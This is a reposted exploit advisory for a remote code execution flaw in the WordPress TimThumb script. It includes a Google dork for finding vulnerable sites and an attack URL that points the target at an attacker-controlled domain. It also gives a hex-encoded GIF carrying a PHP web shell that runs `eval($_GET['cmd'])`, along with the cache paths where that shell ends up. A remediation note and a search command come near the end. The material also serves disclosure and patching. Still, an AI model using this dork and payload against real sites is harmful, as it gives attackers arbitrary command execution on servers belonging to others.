扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 |
# Exploit Title: WordPress TimThumb Plugin - Remote Code Execution # Google Dork: inurl:timthumb ext:php -site:googlecode.com -site:google.com # Date: 3rd August 2011 # Author: MaXe # Software Link: http://timthumb.googlecode.com/svn-history/r141/trunk/timthumb.php # Version: 1.32 # Screenshot: See attachment # Tested on: Windows XP + Apache + PHP (XAMPP) WordPress TimThumb (Theme) Plugin - Remote Code Execution Versions Affected: 1.* - 1.32 (Only version 1.19 and 1.32 were tested.) (Version 1.33 did not save the cache file as .php) Info: (See references for original advisory) TimThumb is an image resizing utility, widely used in many WordPress themes. External Links: http://www.binarymoon.co.uk/projects/timthumb/ http://code.google.com/p/timthumb/ Credits: - Mark Maunder (Original Researcher) - MaXe (Indepedendent Proof of Concept Writer) -:: The Advisory ::- TimThumb is prone to a Remote Code Execution vulnerability, due to the script does not check remotely cached files properly. By crafting a special image file with a valid MIME-type, and appending a PHP file at the end of this, it is possible to fool TimThumb into believing that it is a legitimate image, thus caching it locally in the cache directory. Attack URL: (Note! Some websites uses Base64 Encoding of the src GET-request.) http://www.target.tld/wp-content/themes/THEME/timthumb.php?src=http://blogger.com.evildomain.tld/pocfile.php Stored file on the Target: (This can change from host to host.) 1.19: http://www.target.tld/wp-content/themes/THEME/cache/md5($src); 1.32: http://www.target.tld/wp-content/themes/THEME/cache/external_md5($src); md5($src); means the input value of the 'src' GET-request - Hashed in MD5 format. Proof of Concept File: \x47\x49\x46\x38\x39\x61\x01\x00\x01\x00\x80\x00\x00 \xFF\xFF\xFF\x00\x00\x00\x21\xF9\x04\x01\x00\x00\x00 \x00\x2C\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02 \x44\x01\x00\x3B\x00\x3C\x3F\x70\x68\x70\x20\x40\x65 \x76\x61\x6C\x28\x24\x5F\x47\x45\x54\x5B\x27\x63\x6D \x64\x27\x5D\x29\x3B\x20\x3F\x3E\x00 (Transparent GIF + <?php @eval($_GET['cmd']) ?> -:: Solution ::- Update to the latest version 1.34 or delete the timthumb file. NOTE: This file is often renamed and you should therefore issue a command like this in a terminal: (Thanks to rAWjAW for this info.) find . | grep php | xargs grep -s timthumb Disclosure Information: - Vulnerability Disclosed (Mark Maunder): 1st August 2011 - Vulnerability Researched (MaXe): 2nd August 2011 - Disclosed at The Exploit Database: 3rd August 2011 References: <blockquote class="wp-embedded-content" data-secret="1Ra9EMT9eq"><a href="https://markmaunder.com/2011/zero-day-vulnerability-in-many-wordpress-themes/" target="_blank"rel="external nofollow" class="external" >Zero Day Vulnerability in many WordPress Themes</a></blockquote><iframe class="wp-embedded-content" sandbox="allow-scripts" security="restricted" style="position: absolute; visibility: hidden;" title="“Zero Day Vulnerability in many WordPress Themes” — " src="https://markmaunder.com/2011/zero-day-vulnerability-in-many-wordpress-themes/embed/#?secret=DBMSDKPgCa#?secret=1Ra9EMT9eq" data-secret="1Ra9EMT9eq" frameborder="0" marginmarginscrolling="no"></iframe> <blockquote class="wp-embedded-content" data-secret="nqXuov0ycB"><a href="https://markmaunder.com/2011/technical-details-and-scripts-of-the-wordpress-timthumb-php-hack/" target="_blank"rel="external nofollow" class="external" >Technical details and scripts of the WordPress Timthumb.php hack</a></blockquote><iframe class="wp-embedded-content" sandbox="allow-scripts" security="restricted" style="position: absolute; visibility: hidden;" title="“Technical details and scripts of the WordPress Timthumb.php hack” — " src="https://markmaunder.com/2011/technical-details-and-scripts-of-the-wordpress-timthumb-php-hack/embed/#?secret=nE7Xtubhn7#?secret=nqXuov0ycB" data-secret="nqXuov0ycB" frameborder="0" marginmarginscrolling="no"></iframe> http://code.google.com/p/timthumb/issues/detail?id=212 http://programming.arantius.com/the+smallest+possible+gif |
体验盒子
